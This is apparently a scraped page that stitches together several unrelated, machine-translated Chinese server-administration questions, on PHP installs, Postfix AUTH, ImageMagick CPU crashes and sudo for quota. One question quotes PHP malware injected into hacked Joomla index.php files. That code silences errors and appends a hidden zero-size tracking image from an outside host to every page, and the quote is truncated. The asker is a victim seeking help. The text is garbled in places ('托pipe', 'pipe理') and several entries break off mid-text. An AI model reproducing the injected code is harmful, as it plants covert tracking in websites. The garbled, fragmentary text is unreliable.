在现有的iPlanet Web服务器上,我们现在必须在Red Hat Enterprise Linux 4上安装PHP5和MySQL 5.是否有任何推荐的指南或最佳实践来安全地安装这两个工具,并将其从黑客加固到这个面向公众的服务器上?
我正在使用需要机器外部IP的API。 据我所知,我使用的PHP环境只能得到我们的内部IP。 桌面上的选项是使用一个外部服务,如whatismyip.com告诉我们: wget -q -O – http://whatismyip.com/automation/n09230945.asp 我担心如果失败会发生什么。 是否有一种不依靠外部服务来确定机器IP的防弹方法?
可能重复: 我的服务器被黑了应急 所有的Joomla! 在我的单个服务器上托pipe的站点被黑客攻击,并将以下代码注入到许多目录的index.php文件中。 <?php //{{126104ed GLOBAL $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1; $olderrxxx=error_reporting(0); function outputxxx_callback($str) { $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>'; preg_match("|</body>|si",$str,$arr); return str_replace($arr[0],$links.$arr[0],$str); } function StrToNum($Str, $Check, $Magic) { $Int32Unit = 4294967296; $length = strlen($Str); for ($i = 0; […]
===解决=== 这个问题解决了。 原来ImageMagick在多个CPU上有问题。 编译ImageMagick使用一个CPU解决了这个问题。 ================ 我添加了一个新的Web服务器作为升级,但它在几秒钟内落下。 旧盒子有2.33GHz的8个Xeon核心。 新机器有2.40GHz的16个Xeon核心。 内存是新机上的8G和32G。 另一个主要区别是从32位跳到64位。 OS是CentOS 5.6,Apache也是2.2.3-45。 PHP是5.2.10和手工编译的。 除了体系结构位之外,configuration选项是相同的。 从所有这些信息,你会认为新的机器会尖叫,但目前的盒子处理负载和偶尔跌倒。 新机器在不到一分钟的时间内就会死亡。 内存不错,I / O好,但是CPU很难挂。 这是从两个mpstat的输出 老盒子 09:14:18 PM CPU %user %nice %sys %iowait %irq %soft %steal %idle intr/s 09:14:20 PM all 31.34 0.00 2.62 9.68 0.12 1.00 0.00 55.24 11163.50 09:14:20 PM 0 53.00 0.00 5.50 16.00 0.50 6.50 0.00 […]
我正在编译PHP 5.3.6,我用作参考的compile configure命令使用–with-layout = GNU选项。 我已经做了一些研究,但我似乎无法find详细的答案。 有人可以详细解释这个选项给我,为什么会使用它? 谢谢!
我负责pipe理一个定制的软件即服务(SAAS)CMS和电子商务系统。 该系统由HAproxy实例背后的LAMP服务器集群提供支持,每个客户/域在集群和LDAP中都有自己的unix帐户。 每个客户购买我们使用cPanel服务器pipe理的一定数量的数据存储,所以配额由标准的linux内核/ NFS配额执行。 我希望能够在我的客户的Webpipe理仪表板中提供磁盘空间使用情况统计信息。 在LAMP集群上,我可以运行/usr/bin/quota domain.name来获取任何给定域使用的磁盘空间。 但是,我们的Apache实例作为UID www-data运行。 允许www-data使用NOPASSWD运行sudo /usr/bin/quota是否安全?
我使用PHP的sSMTP电子邮件发送,它工作正常。 问题是,sSMTP同步执行交付,这增加了我的PHP脚本的延迟,让用户等待一段时间太长。 有没有办法使其工作非阻塞? (我虽然在shell上破解,在后台启动sSMTP进程或者其他东西,并且早一点返回到PHP,但是我不能使它工作。)
这是两个不同的PHP文件的故事。 文件1来源: <?php $null->test(); 文件1输出: 致命错误:在一个非对象中调用成员函数test() /wwwroot/sites/example.com/public/fatal.php在第1行 这也打印到/var/log/php-fpm/www-error.log(在我的www.conf中定义) 文件2: class A {} function test(A $obj) { echo 'here…'; } var_dump('started'); $a = new A(); test($a); var_dump('this is going to error out'); test($null); var_dump('do we get here?'); 文件2输出: string“开始”(长度= 7) 这里… string“这将会出错”(长度= 26) 没有错误logging。 /etc/php-fpm.d/www.conf中的相关设置: catch_workers_output = yesphp_flag [display_errors] =开启 php_flag [display_startup_errors] =开启 php_admin_value [error_reporting] = […]
我想在Centos 6.3 x86_64上编译pHash 0.9.5这里是我所遵循的步骤的细节: $ yum install unzip $ wget https://downloads.sourceforge.net/project/cimg/CImg-1.5.4.zip $ unzip CImg-1.5.4.zip $ $ wget http://phash.org/releases/pHash-0.9.5.tar.gz $ tar xvf pHash-0.9.5.tar.gz $ $ cp CImg-1.5.4/CImg.h pHash-0.9.5/src/ $ $ cd pHash-0.9.5 $ ./configure –enable-video-hash=no –enable-audio-hash=no $ make $ make install 然后一旦安装了pHash,我试着安装这样的PHP扩展: $ cd bindings/php $ phpize $ ./configure checking for grep that handles long lines […]
我试图在Ubuntu 13.04上获得postfix设置,但目前还没有运气。 我在这里find了一些关于ServerFault的问题,但是没有成功。 我重新安装了一堆,什么都没有。 这是我第一次处理它,我跟着这个教程和这个 。 我试过这个答案 ,什么都没有。 这是我从telnet localhost 25和ehlo localhost : 250-elclanrs.localdomain 250-PIPELINING 250-SIZE 10240000 250-VRFY 250-ETRN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN 正如你所看到的,那里没有AUTH … 这是我的main.cf : smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu) biff = no append_dot_mydomain = no readme_directory = no myorigin = /etc/mailname mydestination = $myhostname, localhost.$mydomain, localhost mynetworks = 127.0.0.0/8 192.168.1.0/24 [::1]/128 […]